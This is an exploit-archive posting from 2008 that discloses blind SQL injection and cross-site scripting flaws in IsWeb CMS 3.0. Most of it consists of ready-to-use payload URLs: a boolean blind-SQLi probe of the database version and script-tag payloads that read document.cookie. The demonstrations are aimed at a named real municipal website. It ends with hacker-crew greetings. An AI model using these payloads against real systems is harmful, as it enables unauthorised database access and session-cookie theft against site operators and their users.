[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : IsWeb CMS 3.0 (SQL/XSS) Multiple Remote Vulnerabilities
# Published : 2008-12-14
# Author : XaDoS
# Previous Title : ASPSiteWare RealtyListing V1/V2 SQL Injection Vulnerabilities
# Next Title : The Net Guys ASPired2Protect Database Disclosure Vulnerability
[a–?] IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities
>---------------------------------------<
> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B?§g: Blind $ql inJection
> SIte vuln: http://www.cmsisweb.it
>---------------------------------------<
[a–?] BlinD $qL:
|: http://www.example.com/index.php?id_sezione=[$qL]
> DeM0:
|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No]
|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]
[a–?] XSS:
|: http://www.comune.avezzano.aq.it/index.php?azione=cerca
In this modul (search) write:
"><script>alert(document.cookie)</script>
or another vuln Page:
|: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E
[a–?] Th4nKs::
>Str0ke</ - >Fuck you 007 hacker</ - >Securitycode team</ - >All italian hackers</
# www.Syue.com [2008-12-14]